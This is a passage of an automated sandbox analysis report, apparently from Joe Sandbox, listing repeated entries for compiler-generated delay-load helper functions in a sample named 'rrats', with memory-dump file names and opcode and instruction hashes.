                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: c35b3e89e558720021c4ae216410512c7f7cdf94dc4ef96509d03a5f9424f6bb
                                                              • Instruction ID: 391aebd2470cfeb1def2727f12d33a6777626d6dd278d4269ce127717c2a6ffc
                                                              • Opcode Fuzzy Hash: c35b3e89e558720021c4ae216410512c7f7cdf94dc4ef96509d03a5f9424f6bb
                                                              • Instruction Fuzzy Hash: 6CB012C12D9401BE3104620D1C02EFB014DC0C1F14730413FF508C02C0E8404C095432
                                                              Function 00CBE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 343a50dee50dd2ab0461675546b854fcd8e48ca690a3688a963b5b671772fbdd
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: 343a50dee50dd2ab0461675546b854fcd8e48ca690a3688a963b5b671772fbdd
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              Function 00CBE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 5c02a0c3255612935286deb5e843c401cdfc3d69b522b37c4f918f54390c3314
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: 5c02a0c3255612935286deb5e843c401cdfc3d69b522b37c4f918f54390c3314
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              Function 00CBE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: f8d5455651922a69de391e34ac36ec20c49933b600b482330fd56e2e8c93a5f7
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: f8d5455651922a69de391e34ac36ec20c49933b600b482330fd56e2e8c93a5f7
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              Function 00CBE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 6b94d124fe68e2af3fe792b5b8548ab9bd12068c4969abef2cd4b8116be88ae0
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: 6b94d124fe68e2af3fe792b5b8548ab9bd12068c4969abef2cd4b8116be88ae0
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              Function 00CBE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 5683f5fa2d9626c37b937b8c1613e826389c1a83fe18cdce2ef31e3dd27db669
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: 5683f5fa2d9626c37b937b8c1613e826389c1a83fe18cdce2ef31e3dd27db669
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              Function 00CBE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 88e3e30054568c33a99fb0da7f79058d12422e9269b444fcc1d695f14d055742
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: 88e3e30054568c33a99fb0da7f79058d12422e9269b444fcc1d695f14d055742
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              Function 00CBE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: c63312fa77354543997a78457c40293544c7e703447cce3e4703c0bf070e177c
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: c63312fa77354543997a78457c40293544c7e703447cce3e4703c0bf070e177c
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              Function 00CBE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 31211973cf3c33849dbd6b971c243b4fd8330c833b68e3e515827bc9ad06f13e
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: 31211973cf3c33849dbd6b971c243b4fd8330c833b68e3e515827bc9ad06f13e
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              Function 00CBE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: e7ee85e613b45c66352e929dc40d4c8a21ca593af93a097ecc526be381505cc0
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: e7ee85e613b45c66352e929dc40d4c8a21ca593af93a097ecc526be381505cc0
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              Function 00CBE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 90fec3aec0d2bae908abbaca2a45468d0f3bed9514e3b3ada8d2a4c58d577e0e
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: 90fec3aec0d2bae908abbaca2a45468d0f3bed9514e3b3ada8d2a4c58d577e0e
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              Function 00CBE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: a75701d738336d1f177580bb54f34baa2d275ae47c6a96efeb80aa9c3aff0495
                                                              • Instruction ID: 40be3938acde55064429fedaa63ebf63c0b7ae5a423d0fdb3be58e557473fe60
                                                              • Opcode Fuzzy Hash: a75701d738336d1f177580bb54f34baa2d275ae47c6a96efeb80aa9c3aff0495
                                                              • Instruction Fuzzy Hash: 60A011E22A80023C3A0822022C82CFB028EC0C0F28B30802EF820A00C0AC800C02A8B2
                                                              Function 00CBE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: c3ef2273dc2896f76bf52f22204063e5f99dabf58288bee628e50d7e8d1424bb
                                                              • Instruction ID: 4acc3b76ffa8c2a5053a67c09a9ba7558301284ad57c10c9220053264e6e2197
                                                              • Opcode Fuzzy Hash: c3ef2273dc2896f76bf52f22204063e5f99dabf58288bee628e50d7e8d1424bb
                                                              • Instruction Fuzzy Hash: F1A011E22A8002BC3A0822022C82CFB028EC0C0F20B30882EF802800C0A8800C02A8B2
                                                              Function 00CBE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 0c9844e05995801c76050b4ed9b1deea4d4b949a05698f1894d2340519e1c0a9
                                                              • Instruction ID: 4acc3b76ffa8c2a5053a67c09a9ba7558301284ad57c10c9220053264e6e2197
                                                              • Opcode Fuzzy Hash: 0c9844e05995801c76050b4ed9b1deea4d4b949a05698f1894d2340519e1c0a9
                                                              • Instruction Fuzzy Hash: F1A011E22A8002BC3A0822022C82CFB028EC0C0F20B30882EF802800C0A8800C02A8B2
                                                              Function 00CBE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
